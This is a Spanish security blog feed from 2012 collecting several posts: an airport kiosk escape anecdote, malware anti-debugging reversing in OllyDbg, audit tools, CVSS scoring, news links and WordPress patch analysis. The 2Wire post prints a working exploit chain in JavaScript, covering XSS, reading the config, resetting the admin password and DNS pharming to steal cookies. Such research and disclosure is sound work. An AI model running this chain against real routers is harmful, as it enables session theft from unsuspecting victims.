Security By Default

BMW ¿Te gusta conducir?

noreply@blogger.com (Lorenzo Martínez) — Fri, 25 May 2012 04:32:00 +0000

La historia que cuento hoy tuvo lugar el 24 de Marzo en la Terminal 4 del aeropuerto de Barajas en Madrid. Ese día me disponía a emprender un largo y pesado viaje a Bogotá, a lo que resultó en una enriquecedora experiencia: el ACK Security Conference. Sin embargo, cuando me dirigía a buscar el tren que me llevara a la Terminal 4 Satélite, una preciosidad me frenó en seco. No, no era ninguna chica,… sino la máquina que véis expuesta en la siguiente foto.

Después de ver bien el coche, acompañado por un montón de gente a mi alrededor, me fijo que a mi espalda estaba el típico expositor que suele mostrar una película con la campaña publicitaria del coche. Como tenía tiempo, quise echar un vistazo para ver esta joya en movimiento, aunque no sea en vivo. Mi sorpresa fue aún mayor cuando veo la pantalla:

Lo primero que pensé fue: Mira que bien, un regalito para los chicos de Flu Project en modo de "Pantalla pública". Sin embargo después me vino a la cabeza, ver qué recursos tenía disponibles para hacer alguna otra "maldad" :)

Se nota que la crisis ha llegado hasta el departamento de márketing de BMW, que no tiene fondos para pagar sus copias originales de Windows… o al menos no se han preocupado de hacer la correspondiente validación.

La gente de BMW dejó a gusto del usuario que "hubiese o no película" para ver.

Como tenía gente por todas partes y vaya usted a saber cuántas cámaras me apuntaban, decidí verla un rato para evitar las sospechas:

Bueno, veamos qué más se puede hacer con una pantalla táctil sin teclado… un ipad de taitantas pulgadas. Menos mal que estos chicos de Windows pensaron en lo del teclado virtual desde hace tiempo.

Pensé que la foto de David Hasselhoff en una pantalla así de grande, tenía que verse cuanto menos divertida. Veamos si hay acceso a Google de momento.

Vaya,… la máquina no tiene conexión a Internet de momento.

¿Tendremos la suerte de estar conectados a alguna red del propio aeropuerto? Buscamos una shell y….

Mira que bien, con usuario BMW y todo… Busquemos red:

Vaya,… parece que estamos en un ordenador aislado, sin red local, aunque,… oh wait! "Vodafone Mobile Broadband"??? Eso quiere decir que tiene una conexión USB 3G en algún sitio. Normal, porque de alguna forma el expositor, que ahora mismo no está aquí, tendrá que leerse el periódico y actualizar su Facebook y Twitter no? Eso quiere decir que en alguna parte, tiene que haber un iconito que…

Tacháaaan!

Parece que estamos a un click…

Y sin embargo,…

... mi gozo en un pozo! "RAS 631 Error"? No me digas que justo hoy va y se cae el enlace 3G de Vodafone. Visto lo visto con la licencia del Windows XP, a lo mejor les cortaron el acceso por falta de pago :)

Quizá por eso no había nadie en el expositor y dejaron el coche solo. Quizá los comerciales de BMW se fueron a conectar a Internet en otro sitio.

Pensé en hacer "la bromita" de un "Imprimir pantalla", esconder todos los iconos y la barra de tareas, y poner el pantallazo como fondo de pantalla… pero ya me dio palo que por tener que dar explicaciones en la comisaría del aeropuerto por estar jugueteando con el ordenador, perdiese el vuelo a Colombia.

Al menos os dejo con otro clásico… la calculadora de Windows!

Robo de cookies por router vulnerable (caso 2Wire)

noreply@blogger.com (Contribuciones) — Thu, 24 May 2012 04:32:00 +0000

Desde hace tiempo es conocido que los routers caseros están plagados de vulnerabilidades. En este caso mostramos como una serie de vulnerabilidades en routers 2Wire, al ser explotadas secuencialmente, permiten obtener remotamente los valores de las cookies de casi cualquier dominio.

El proceso de ataque sería el siguiente:

1. La víctima visita una página maliciosa con un módem vulnerable,

2. La página realiza pharming al router redirigiendo subdominios al servidor del atacante,

3. La página obliga a la víctima a realizar peticiones a los subdominios,

4. El atacante recibe en su servidor las cookies de los dominios.

Utilizamos subdominios inexistentes por dos razones. Al usar un subdominio inexistente el navegador no tiene la dirección IP en el cache. Y la segunda razon es que en caso de que exista algún error, la comunicación con el dominio original no se pierde.

Los routers 2Wire han tenido múltiples vulnerabilidades en los últimos años. Para realizar este ataque nos enfocamos en las siguientes:

1. Cross site scripting

2. Revelación de configuración (“url mágico”)

3. Reinicialización de contraseña con la clave WEP default

Algunos routers 2Wire poseen un cross site scripting reflejado en la variable THISPAGE de su interfaz de configuración web:

http://192.168.1.254/xslt?PAGE=A05&THISPAGE=</script><script>with(document)body.appendChild(createElement("script")).setAttribute("src","cfgpwn.js");</script><script>

Explotando el cross site scripting podemos estar en la misma zona del router y obtener acceso a sus propiedades, como la información de las páginas del router.

Inyectamos un script que nos permite leer la información de la configuración debido a la vulnerabilidad de revelación de configuración. Leemos el archivo y obtenemos la WEP default:

cfgpwn.js:

try {

xmlhttp=new ActiveXObject("MSXML2.XMLHTTP");

} catch(e) {

xmlhttp = new XMLHttpRequest()

}

xmlhttp.open("GET","/xslt?page=mgmt_data",false);

xmlhttp.send(null);

var info = xmlhttp.responseText;

var pass = "temporal";

var wep = info.substr(info.indexOf("encrypt_key\"\>0x")+15,10);

Utilizando la clave WEP default podemos definir una nueva contraseña de administración web. De la siguiente manera usamos la WEP para cambiar el password:

xmlhttp.open("POST","/xslt");

xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

xmlhttp.send("PAGE=A04_POST&THISPAGE=A04&NEXTPAGE=A04_POST&SYSKEY="+wep+"&PASSWORD="+pass+"&PASSWORD_CONF="+pass+"&HINT="+pass);

Ya que hemos definido un password, podemos obtener la sesión de administrador para obtener privilegios en el router. Para esto realizamos la siguiente petición:

xmlhttp.open("GET","/xslt?PAGE=A02_POST&THISPAGE=&NEXTPAGE=J01&CMSKICK=&PAGE=A02&NEXTPAGE=J01&SHOWHINT=1&PASSWORD="+pass, false);

xmlhttp.send(null);

Como administradores podemos agregar dominios a la lista de hosts. Agregamos subdominios de los dominios de los cuales queremos las cookies:

for (var i=0; i<dominios.length; i++) {

dns=dominios[i];

xmlhttp.open("GET","/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME="+dns+"&ADDR="+ip,false);

xmlhttp.send(null);

}

Obligamos a la víctima a realizar peticiones a los subdominios para que envíe las cookies:

for (var i=0; i<dominios.length; i++) {

dns=dominios[i];

document.write('<img src=http://'+dns+'>');

}

Todo esto se podría automatizar y realizar de forma oculta para la víctima. En el siguiente video se muestra la explotación de una forma visible:

Hay que entender que en este caso 2Wire ha publicado parches para todas estas vulnerabilidades hace tiempo, pero en muchas ocasiones no depende del usuario o fabricante el actualizar, depende del proveedor de servicio.

Contribución cortesía de Pedro “hkm” Joaquín de Websec México

Reversing malware tales: IsDebuggerPresent ?

noreply@blogger.com (Yago Jesus) — Wed, 23 May 2012 06:09:00 +0000

Llevo tiempo queriendo iniciar una saga de posts sobre análisis de malware donde tratar los distintos tipos de análisis, ya sean por comportamiento (sandbox, herramientas tipo processmonitor, etc) o vía debugger.

Así mismo me fijé como objetivo que fuese sobre muestras 'in the wild'.

Debo agradecer a Javi, del GDT, su amabilidad a la hora de proveerme de muestras que ellos tienen disponibles por su ímproba labor en la investigación de delitos informáticos.

Hoy voy a hablar de algo que encontré a la hora de analizar una de las muestras que me facilitaron. Es muy típico de un programa que está orientado a 'cosas oscuras' que incorpore algún tipo de técnica para protegerse de miradas excesivamente curiosas. Muchos utilizan 'packers' para ofuscar el código y otros, como del que vamos a hablar hoy, sencillas técnicas para detectar la presencia de debuggers.

En concreto esta muestra hace uso de la función IsDebuggerPresent() para detectar si está siendo ejecutado a través de un debugger.

¿Cómo detectar que se está haciendo uso de de esta función? El primer paso es abrir la muestra con Ollydbg y ver las llamadas a la API que emplea el malware:

Olly nos muestra las diferentes funciones que emplea este espécimen de Malware y de entre toda la lista, nos encontramos con:

Con lo que tenemos la certeza de que este espécimen, en algún punto, va a intentar averiguar si está siendo analizado por un debugger. Evidentemente esto es bastante sospechoso.

Vamos a poner un breakpoint para tener el control justo cuando el malware vaya a hacer uso de dicha función.

Y pulsamos F9 para lanzar el programa, que se detendrá justo cuando se vaya a hacer uso de la función

Si agrandamos la imagen (click en ella) podemos ver que Olly nos indica que el programa está pausado justo en la función IsDebuggerPresent().

Esta función pertenece a otro módulo (kernel32) por lo que deberemos retornar al programa principal para ver que sucede justo después de esa llamada.

Para ello vamos al menú 'Debug' y seleccionamos 'Execute till user code' o pulsamos ALT+F9

Lo que nos devolverá al programa principal justo después de la llamada a IsDebuggerPresent()

Vemos que, justo después, lo que hace el programa es verificar si EAX vale 0 (TEST EAX, EAX), en EAX está almacenado el resultado de la función IsDebuggerPresent() y como en este caso es cierto, el programa se está ejecutando en un debugger, el valor de EAX es 1

Podemos leer en la descripción de IsDebuggerPresent() lo siguiente:
'If the current process is running in the context of a debugger, the return value is nonzero.'

También vemos que, como el resultado de TEST EAX, EAX no es 0, el flag Z no se activa y permanece a 0

Si pulsamos F7, iremos a la siguiente línea de ensamblador que es un salto condicional JNZ

Como podemos ver si agrandamos la imagen, olly en la parte inferior nos indica que 'Jump is taken', es decir que el va a saltar porque JNZ significa 'Jump if NOT Z' y como el resultado de TEST EAX, EAX no ha activado el flag Z, hará ese salto condicional que nos lleva a una rutina de exit. Obviamente esto no es lo que queremos ya que nos perderemos la parte divertida donde empiezan los fuegos artificiales.

¿Como resolvemos esta situación? Muy fácil, tan solo tenemos que, en ese punto, hacer doble click sobre el flag Z y cambiar su valor a 1, de esa forma el Jump no se hará y el programa seguirá su curso esperado.

Una vez cambiado el flag Z, podemos ver que Olly nos dice que no se hará el salto.

Como hemos visto saltarse esta 'protección' es extremadamente fácil, en este punto podríamos cambiar ese JNZ por NOPs y salvar el fichero con las modificaciones para que la protección quede desactivada para siempre.

No obstante, hay un método más fácil. Existe un plugin para Olly llamado 'Hide Debugger' que directamente lidia con este tipo de 'protecciones' para evitar que el debugger sea detectado. No solo se ocupa de IsDebuggerPresent() sino de otras técnicas que se emplean habitualmente.

DoRodri - Falla de Restricción de Acceso a URL

noreply@blogger.com (Contribuciones) — Tue, 22 May 2012 12:23:00 +0000

Como proyecto de final de master de seguridad, se planteó analizar una de las vulnerabilidades top 10 de OWASP, en concreto la vulnerabilidad es conocida como, Falla de Restricción de Acceso a URL. Cómo resultado de este análisis se ha desarrollado una herramienta con el objetivo servir de ayuda en auditorias de caja blanca para detectar esta vulnerabilidad.

Debido a la dificultad de poder detectar de manera automática cuando esta previsto restringir el acceso y cómo saber si este ha sido restringido correctamente, unas veces se verá un mensaje de error, otras un mensajito más amigable dentro del interfaz de la propia aplicación web y otras veces, las que menos, una pantalla en blanco. Se ha optado por otra solución a nuestro entender más lógica. La herramienta muestra para cada url los datos estadísticos más básicos al emplear cada perfil: número de letras, con y sin blancos, y número de líneas. Y permite para cada url acceder a una ventana comparativa en la que contrastar las diferencias a mayor profundidad entre parejas de perfiles.

La herramienta, DoRodri, ha sido desarrollada en .Net y se encuentra bastante estable aunque seguramente sujeta a algunos bugs.

Para su funcionamiento es preciso obtener previamente:

Un fichero con las urls a analizar: se puede obtener de programas como el OWASP ZAP con la opción “exportar todas las urls a aun fichero”.
Un listado de cookies de identificadores de sesión validos para los distintos perfiles a analizar. Una vez obtenido lo anterior es hora de pasárselo al programa para que analice la web.

El programa de manera automática, tras cargar el fichero de urls, genera un árbol con la estructura de la web a analizar, obtiene las capturas de pantalla de cada perfil y muestra la opción de descargar los códigos fuente para estimar diferencias a nivel de código html.

Una vez obtenida la información por parte del programa empieza el trabajo humano, hay que comparar para cada url, o las que el analista estime oportuno, si el control se realiza de manera correcta.

Al pulsar sobre cada miniatura se muestra una ventana comparativa en la que muestra la respuesta visual que arroja la aplicación web para cada perfil. Adicionalmente en la parte inferior se aprecian las estadísticas sobre el número de líneas y caracteres, y en la superior se realiza una comparación a nivel de código indicando el grado de diferencia que hay entre los dos códigos html mediante el cálculo del factor de distancia de Damerau–Levenshtein. Entendiendose como tal al número mínimo de operaciones requeridas para transformar una cadena de caracteres en otra. Se entiende por operación, bien una inserción, eliminación, sustitución o transposición de dos caracteres.

Esta información estadística permite para perfiles con privilegios cercanos, en los cuales la interfaz es muy similar, obtener datos bajando al nivel de código, sobre el grado de similitud real que hay entre ambos. Para obtener la herramienta y más información se puede acceder a la página del proyecto:

Dirección de la herramienta: http://failuretorestrictaccess.wordpress.com/

Todo comentario, sugerencia o crítica será bienvenida.

¡Gracias!

Autores:
Fernando Andina.

José Miguel Soriano.

Centro de Servicio de Vulnerabilidades - VulnerabilityChaser

noreply@blogger.com (Contribuciones) — Tue, 22 May 2012 06:08:00 +0000

Somos Ibrahim Peraza y María Ángeles Caballero, dos alumnos del Máster Universitario de las Tecnologías de la Información y la Comunicación de la UEM trabajando en el Proyecto de Fin de Máster “Centro de Servicio de Vulnerabilidades - VulnerabilityChaser”. Los profesores del Máster ofertan proyectos relacionados con el mundo de la seguridad y éstos, se desarrollan por varios alumnos. Los proyectos requieren un trabajo previo de investigación, abordando un análisis en profundidad de la problemática concreta y un desarrollo posterior, siempre tutelado por el director del proyecto, en nuestro caso Alejandro Ramos.

En concreto, nuestro proyecto va enfocado a la gestión de vulnerabilidades de los activos de una compañía. Al realizar un estudio previo pudimos observar varias deficiencias en la información que proporcionan los escáneres de vulnerabilidades como pueden ser Nessus o GFI LANguard. Son herramientas muy potentes en cuanto al análisis de vulnerabilidades, pero la información que se muestra acerca de la severidad de las vulnerabilidades no es del todo realista, ya que la puntuación se basa en valores estándar como el CVSS Base sin tener en cuenta factores concretos del sistema afectado como puede ser si es un equipo en producción o simplemente se utiliza para pruebas de desarrollo. Otra deficiencia observada, es que no es posible ver la evolución del estado de las vulnerabilidades a lo largo del tiempo (abierta, cerrada, asumida o planificada), ya que los escáneres de vulnerabilidades nos entregan un informe sobre el estado de nuestros activos en un instante de tiempo concreto, no guardan los datos para ser comparados frente a futuros escaneos.

Nessus usa el CVSS base score para clasificar la severidad de una vulnerabilidad pudiendo ser info, medium, high o critical. El CVSS base score no es suficiente para determinar la severidad de una vulnerabilidad ya que entran en juego otros factores, como por ejemplo, la existencia o no de un exploit para dicha vulnerabilidad, el tipo de información que almacena el sistema, tipo de entorno (integración, preproducción o producción) , etc.

Lo ideal sería calcular para cada vulnerabilidad el CVSS final. El CVSS se calcula en función de 3 vectores: base, temporal y environmental:

- Base: representa las características intrínsecas y fundamentales de una vulnerabilidad que son constantes en el tiempo y en los entornos de usuario.
Las métricas de éste vector comprenden:

Access Vector (AV): refleja como la vulnerabilidad es explotada.

Local (L); Adjacent Network (A); Network Access (N).

Access Complexity (AC): mide la complejidad del ataque para explotar la vulnerabilidad.

High (H); Medium (M); Low (L).

Authentication (Au): mide el número de veces que un atacante debe de autenticarse para explotar la vulnerabilidad.

Multiple (M); Single (S); None (N).

Confidentiality Impact (C): este indicador mide el impacto sobre la confidencialidad de una vulnerabilidad al explotarla.

None (N); Partial (P); Complete (C).

Integrity Impact (I): este indicador mide el impacto a la integridad de una vulnerabilidad.

None (N); Partial (P); Complete (C).

Availability Impact (A): este indicador mide el impacto a la disponibilidad de una vulnerabilidad.

None (N); Partial (P); Complete (C).

- Temporal: representa las características de una vulnerabilidad que cambian con el tiempo pero no entre los entornos de usuario.
Las métricas de éste vector comprenden:

Exploitability (E): esta métrica mide el estado actual de las técnicas de exploit o disponibilidad de código.

Unproven (U); Proof-of-Concept (POC); Functional (F); High (H); Not Defined (ND).

Remediation Level (RL): mide el nivel de corrección de la vulnerabilidad, si existe parche, soluciones provisionales, etc.

Official Fix (OF); Temporary Fix (TF); Workaround (W); Unavailable (U); Not Defined (ND).

Report Confidence (RC): esta métrica mide el grado de existencia de confianza en la vulnerabilidad.

Unconfirmed (UC); Uncorroborated (UR); Confirmed (C); Not Defined (ND)

- Environmental: representa las características de una vulnerabilidad que son relevantes y únicas para el entorno de cada usuario concreto.
Las métricas de éste vector comprenden:

Collateral Damage Potential (CDP): éste indicador mida la potencia de pérdida de vidas o bienes físicos a través del daño de equipos o robo de éstos.

None (N); Low (L); Low-Medium (LM); Medium-High (MH); High (H); Not Defined (ND)

Target Distribution (TD): éste indicador mide la proporción de los sistemas vulnerables, número de sistemas que podrían verse afectados por la vulnerabilidad.

None (N); Low (L); Medium (LM); High (H); Not Defined (ND)

Security Requirements (CR, IR, AR): éstas medidas permiten personalizar la puntuación del CVSS dependiendo de la importancia de los activos afectados medido en términos de Confidencilidad, Integradidad y Disponibilidad.

None (N); Low (L); Medium (LM); High (H); Not Defined (ND)

Finalmente, cada métrica tendrá un valor asociado, lo que formará los 3 vectores:

Base    AV:[L,A,N]/AC:[H,M,L]/Au:[M,S,N]/C:[N,P,C]/I:[N,P,C]/A:[N,P,C]
Temporal    E:[U,POC,F,H,ND]/RL:[OF,TF,W,U,ND]/RC:[UC,UR,C,ND]
Environmental
    CDP:[N,L,LM,MH,H,ND]/TD:[N,L,M,H,ND]/CR:[L,M,H,ND]/ IR:[L,M,H,ND]/AR:[L,M,H,ND]

Podemos consultar en FIRST el cálculo del score de cada uno de los vectores y el CVSS final.

VulnerabilityChaser, la herramienta que hemos desarrollado, gestiona el ciclo completo de vida de la vulnerabilidad. La aplicación permite la introducción del resultado de un microanálisis de riesgos por cada activo del sistema utilizándolo (el resultado) para calcular el valor del CVSS. Los valores base y temporal vienen dados en el escaneo de Nessus y el environmental es el resultado del microanálisis de modo que con estos tres parámetros se realiza el nuevo cálculo de la criticidad de la vulnerabilidad quedando ésta adaptada de forma real al entorno en que se encuentra.

VulnerabilityChaser, hace las funciones de centro de servicio de vulnerabilidades para una empresa, facilitando la vida al administrador de seguridad. Esta herramienta es gratuita y opensource pudiendo ser descargada de GitHub. A día de hoy la aplicación aún se encuentra en un estado alfa de desarrollo.

La aplicación recoge la información de las vulnerabilidades de los escaneos de Nessus y la muestra de manera ordenada; permite cambiar el estatus de una vulnerabilidad, por ejemplo, de abierta a planificarla en una fecha para solucionarla más adelante si se quisiera, gestionar toda la parte de activos previamente comentada, mostrar estadísticas de manera gráfica y otras muchas funcionalidades.

Artículo escrito por Ibrahim Peraza y María Ángeles Caballero.
Twitter: @vul_chaser

Llegan los recortes, también a la seguridad

noreply@blogger.com (Lorenzo Martínez) — Mon, 21 May 2012 04:32:00 +0000

Lamentablemente, nos estamos acostumbrando a que, todos los viernes, tengamos una sorpresa nueva de recortes por parte del gobierno de España. La crisis se ha extendido, con la velocidad de la peste, a todos los sectores. Empresas en las que la seguridad era algo en lo que NO se podía recortar, porque "imagínate si no invertimos en seguridad, nos la pueden liar",… han pasado a tener el presupuesto justo para pagar los mantenimientos de los medios de seguridad más importantes y nada más. He llegado a ver casos extremos en que ni siquiera los discos de una SAN, donde se almacenaba la información más valiosa de la organización, estaban bajo mantenimiento...

En épocas de bonanza en las que las empresas destinaban cantidades ingentes de dinero en adaptarse a la mitigación de las últimas amenazas, se veían grandes infraestructuras formadas por una legión de máquinas especializadas en protección perimetral.

Bueno, y si ahora hubiese que recortar: ¿con qué nos deberíamos quedar?

La verdad es que es difícil para un responsable de seguridad, acostumbrado a "un estado de bienestar" con infraestructuras que le ayudan a su trabajo diario, tener que sacrificar a uno o varios de sus "hijos" para poder seguir adelante. Como cada día, en la vida, las decisiones se toman evaluando los riesgos y priorizando lo que realmente es imprescindible, ante lo que es necesario y lo deseable.

Después de leer artículos en los que se llega a dudar de la importancia/necesidad de elementos de seguridad como los propios cortafuegos, he querido elaborar mi propia lista de recortes explicando el por qué.

Recortemoshh pueshhh…

Los cortafuegos, en mi opinión, serían "la Sanidad", y NO deberían "recortarse"/"eliminarse" en ninguno de los casos. En los artículos que menciono anteriormente, los autores se refieren a los firewalls como aquellos elementos que simplemente filtran tráfico en base a origen/destino/puerto… Creo que se plantean la "imprescibilidad" de los firewalls porque tienen en mente la funcionalidad que tenían estos dispositivos de los años 90. En este siglo los firewalls, además de dotar de mecanismos de mitigación de ataques propios de red (SYN-Flood, Land, Smurf, etc,…) comenzaron a incluir en la misma caja montones de funcionalidades: VPN, Antimalware, Antispam, IPS, gestión de ancho de banda, gestión de contenidos y proxy saliente (análisis de tráfico web), etc… es decir, que los UTM (Unified Thread Management) no pueden ser eliminados de las infraestructuras. Una opción de recorte, para evitar pagar altos precios en mantenimiento de estas soluciones, sería buscar una opción libre. Sin embargo, en una sola caja, aún no doy con un pack de funcionalidades UTM con una GUI elaborada, que me convenza totalmente contra soluciones comerciales (aunque típicamente caras) como Checkpoint, Fortinet, Juniper, Stonesoft o NetASQ.

Antimalware: Aunque hay opciones libres como ClamAV o Avast!, en general las políticas de compras de las grandes y medianas corporaciones, prefieren que estas soluciones sean "de marca". En mi caso, llamadme tradicional si lo preferís, pero yo también lo prefiero. No voy a mostrarme más a favor de unos que de otros: pero mis top serían los que llevan años funcionando durante años: McAfee, Trendmicro, Kaspersky, Symantec, NOD32 o el producto nacional Panda. En general, las buenas prácticas de seguridad, recomiendan que los antimalware que se incluyen en el gateway y en los puestos de trabajo, sean de diferente fabricante/marca/tecnología. Si tuviésemos que recortar en algo, evidentemente no se puede prescindir de solución antimalware, pero sí que se puede aunar en un mismo fabricante (siendo consciente que el nivel de seguridad puede disminuir) a fin de conseguir una mejor oferta.

Sondas IDS/IPS: Si además de enterarnos/bloquear ataques de aplicación a nivel del firewall, es necesario almacenar eventos de ataque en otro tipo de redes no separadas por algún firewall/UTM (quizá sea un problema de diseño de la red), las sondas IDS/IPS deberían mantenerse, aunque puede migrarse a soluciones libres como Snort, el IDS/IPS libre por referencia.

Consolidación y correlación de eventos: Típicamente muy caras, las soluciones comerciales tipo RSA Envision o HP Arcsight. Dado el gran número de elementos de una red grande, este tipo de dispositivos, hace manejable el saber "qué está pasando" en la red en todo momento, y ser capaces de encontrar un problema de forma rápida. Sin embargo, en época de recortes, se puede perder calidad de eventos/reporting yendo a herramientas económicas (o gratuitas) como OSSIM o Syslog-NG (salvando las enormes diferencias entre uno y otro) por ejemplo.

Sistemas de monitorización: Herramientas comerciales conocidas y muuuy caras del estilo de HP Openview, pueden ser sustituidas por opciones libres como Cacti y/o Nagios.

Sistemas Anti-DoS: Aquellas organizaciones que cuenten con este tipo de soluciones "anti-Anonymous" del estilo de Arbor Networks (siempre he dudado de su efectividad ante un ataque con suficientes seguidores, pero bueno), deberán plantearse, si no suelen aparecer en las charlas de 4Chan, el considerar estas soluciones como algo "deseable" en vez de imprescindible.

Como vemos, hay tecnologías de seguridad perimetral en las que se puede ir a soluciones más baratas/libres, y aunque es complicado decidir qué piezas sacrificar, cierto es que nos hemos hartado de escribir posts en SbD en los que alertamos que ante ataques dedicados y cuidadosamente preparados, es muy complicado mitigar, incluso no contando con más herramientas que la propia formación y costumbres de los usuarios. Por eso, una vez más repetimos eso de que "no hay que recortar en educación", porque no se saca nada con disponer de herramientas que fortifiquen el acceso externo a una organización, cuando la peor amenaza es tener gente poco formada en seguridad trabajando dentro de ella.

Enlaces de la SECmana - 124

noreply@blogger.com (José A. Guasch) — Sun, 20 May 2012 08:00:00 +0000

El 10 de Mayo aparecía en pastebin un breve post acerca de una supuesta backdoor en los teléfonos Score M de ZTE, cuyo sistema operativo corresponde con Android, y se distribuye en Estados Unidos. Consistía según la prueba en una aplicación con setuid-root que proporciona una shell con privilegios máximos, siempre que se ejecute con un parámetro que corresponde con una palabra clave hardcodeada. Pues bien, ZTE ha confirmado dicha aplicación y vulnerabilidad, la cual parece ser se utilizaba por la compañía para actualizar el dispositivo según un investigador...
Hopper para Mac OS X, desensamblador, decompilador y depurador y buena alternativa a IDA, ha sido actualizado a la versión 2..2.0 y ya se encuentra disponible en la App Store utilizando este enlace.
Se está explotando una vulnerabilidad remota de PHP 5.4.3 en Windows, aprovechando el fallo en la función com_print_typeinfo, según informan en el blog del ISC de SANS.
Gracias a un tweet de Mathieu Renard nos enteramos de la existencia de TrueCrack, un programa de fuerza bruta que pretende obtener contraseñas de volúmenes de TrueCrypt. Funciona en Linux y está optimizado para trabajar con tecnología Cuda de Nvidia.
En el blog del Security Research & Defense de Microsoft se anunció este pasado martes la liberación de la versión 3 de EMET, Como principales novedades, cabe destacar la posibilidad de implantación en entornos corporativos mediante SCCM y política de grupo, capacidad de reporte mediante un notificador y un configurador más sencillo. Esta nueva versión se puede descargar de este enlace.
Una vulnerabilidad en la API de Kickstarter (página para el apoyo de ideas de proyectos, tambien conocido como crowfunding) permitió acceder a más de 70,000 nuevas ídeas y futuros proyectos.
Una actualización del antivirus Avira (para versiones de pago) bloqueaba procesos críticos de Windows y software de terceros, dejando inservibles millones de PCs, debido a que los detectaba como malware. En este post del foro de Avira se discute el caso tras la queja por parte de un usuario.
Vulnerabilidad de Format String descubierta en el plugin pidgin-otr. El fallo, con identificador CVE-2012-2369, podría ser explotado por un usuario remoto permitiendo la ejecución de código en el sistema afectado.
Anunciadas las charlas confirmadas para la próxima Black Hat USA 2012, que se celebrará en Las Vegas el 25 y 26 de Julio. Cabe destacar la presencia de Chema Alonso con la charla sobre botnets Javascript que presentó en Rooted CON 2012 (ampliada) y de Fermín J. Serna sobre técnicas a aplicar a vulnerabilidades que permitirían la fuga de información.
Nueva lección del proyecto Intypedia, número 14, sobre funciones unidireccionales y su utilidad en las comunicaciones digitales.

En lo que pierdo el tiempo: mailinator

noreply@blogger.com (Alejandro Ramos) — Fri, 18 May 2012 05:42:00 +0000

Hace unos años se puso de moda monitorizar sitios como pastebin, incluso han nacido sitios dedicados exclusivamente a esto, como LeakedIn o cuentas de Twitter como PastebinLeaks o PastebinDorks. Todas tienen por objetivo buscar datos sensibles en los nuevos tablones de anuncios de Internet.

Por otra parte, también conocemos servicios web que nos brindan la posibilidad de usar cuentas temporales de correo electrónico donde no guardaremos información sensible, y que preferimos facilitar antes que la de nuestro buzón real, como son mailinator.com o trashmail.net. Este tipo de sitios no requiere autenticación, basta con introducir un nombre de usuario y e voilà

Ahora solo falta unir los dos puntos.

Sin tener demasiado claro que me podía encontrar configuré getmail, para descargarme periódicamente los correos de basura de algunas cuentas de mailinator.com mediante POP3, lo que me pareció mejor opción que usar el RSS o "scrapear" la página.

Con este propósito cree un archivo con los nombres propios más comunes basándome en el número de repeticiones del diccionario de nombres de facebook y palabras basadas en patrones de teclado, como son "qwerty" o "asdf". Muchos de estos patrones pueden ser calculados por john the ripper con el comando: john -external=keyboard -stdout

Una vez ejecutado contra un centenar de cuentas descubrí que mailinator ya contempla gente como yo y tras conectar varias veces, acabas en un filtro durante unos minutos, así que toco meter espacio temporal entre unas peticiones y otras.

Tras unos días bajando spam y correos varios de todos los buzones saqué una lista con los que más tráfico tienen. Por lo menos de la lista inicial.

Para evitar el filtro anticotillas de mailinator, pensé en utilizar GMail como cliente POP3, ya que tienen decenas de direcciones IP desde las que realizan las conexiones y bloquearlo, es mucho más complicado que a mi pobre servidor. Pero por desgracia tan solo permite añadir cinco cuentas de correo. Que anidando cuentas podrían ser muchas más. Pero para ir probando, suficiente, y más teniendo en cuenta que ya sabía las 5 con más datos al día.

Otra ventaja de utilizar GMail es su filtro antispam, que catalogará este tipo de correos con una etiqueta adicional. ¡Ojo!, yo no digo que el objetivo de todo esto, hasta ahora nada claro, no sea tener decenas de miles de correos de spam para montarme mi propio servicio o tal vez buscar correos con malware.

Unos días después ya se pueden consultar los primeros resultados: muchos registros en portales de citas de todos los países del mundo, registros de páginas porno, registros en foros, bastante malware y por supuesto... miles de correos con spam.

Por seguir experimentando usé Yahoo Pipes, hice un ejemplo que obtenía 20 RSS, los mezclaba y eliminaba duplicados, creando un nuevo RSS "limpio" que poder visitar:

Al final, tampoco he encontrado en estos días nada especialmente asombroso, por lo menos en este tiempo. Pero cuando uno mira por un agujerito, nunca sabe que se va a encontrar y cuánto tiempo ha de mirar para ver pasar algo.

Analizando las vulnerabilidades remotas de versiones anteriores a Wordpress 3.3.2

noreply@blogger.com (José A. Guasch) — Thu, 17 May 2012 05:04:00 +0000

Hace unas semanas se anunciaba la versión 3.3.2 de Wordpress, que incluía entre otras cosas, 6 correcciones de seguridad, referentes a varias vulnerabilidades remotas encontradas, y de varios tipos. Ayer en el twitter de Daboblog nos recomendaba parchear nuestros blogs a su última versión debido a estas vulnerabilidades:

Tres de ellas (CVE-2012-2399, CVE-2012-2400 y CVE-2012-2401) fueron detectadas en librerías externas que utiliza Wordpress para subir ficheros en la sección de Multimedia, mediante Plupload, SWFUpload (librería anterior) y SWFObject (esta última se encuentra incluída dentro de muchos themes, y se utiliza para incrustar contenido Flash).

Para estas tres vulnerabilidades, podemos obtener detalles más técnicos referentes a ellas, simplemente revisando los diff de archivos entre ramas de versiones:

Como ejemplo, en el caso de la librería SWFObject (utilizada no sólo en Wordpress), el fallo radica en que no se codificaba previamente el valor de MMredirectURL, O.location, variable Flash utilizada en su instanciación. En la actualización del fichero Javascript, se realiza una codificación de la URL mediante la función encodeURI:

De las otras 3 vulnerabilidades (CVE-2012-2402, CVE-2012-2403 y CVE-2012-2404) se dispone de más información, tratándose de Cross-Site Scriptings y una evasión limitada de restricciones.

CVE-2012-2402 - Se actualiza el fichero plugins.php, habiéndose descubierto la posibilidad de desactivar plugins por parte de usuarios administradores, para toda una red creada de blogs bajo una misma instalación, aun teniendo dicha restricción activada. Esta vulnerabilidad se ha categorizado como baja. A continuación podremos ver los cambios realizados, referentes a una comprobación utilizada para verificar que no se desactivaban plugins que ya estaban desactivados:

CVE-2012-2403 - Se actualiza el fichero wp-includes/formatting.php, cuya función vulnerable era aquella que intentaba habilitar enlaces clicables (make_clickable) dentro de atributos, permitiendo la realización de ataques Cross-Site Scripting. Dicha función se ha re-escrito completamente:

CVE-2012-2404 - Se actualiza el fichero wp-comments-post.php, que incluía una redirección a una variable $location de forma insegura, mediante una función propia de wordpress wp_redirect(). Como actualización, se sustituye el uso de dicha función por otra, llamada wp_safe_redirect(), que incluye comprobaciones y realiza la redirección local de forma más segura.

Si bien no se trata de vulnerabilidades muy críticas, debido a su posible explotación remota se recomienda actualizar Wordpress a su versión 3.3.2 ya disponible.

DNI-E Trojan KIT 1.0

noreply@blogger.com (Yago Jesus) — Wed, 16 May 2012 05:49:00 +0000

El pasado marzo durante la RootedCon, presenté un prototipo de troyano que involucraba el uso fraudulento del Dni Electrónico.

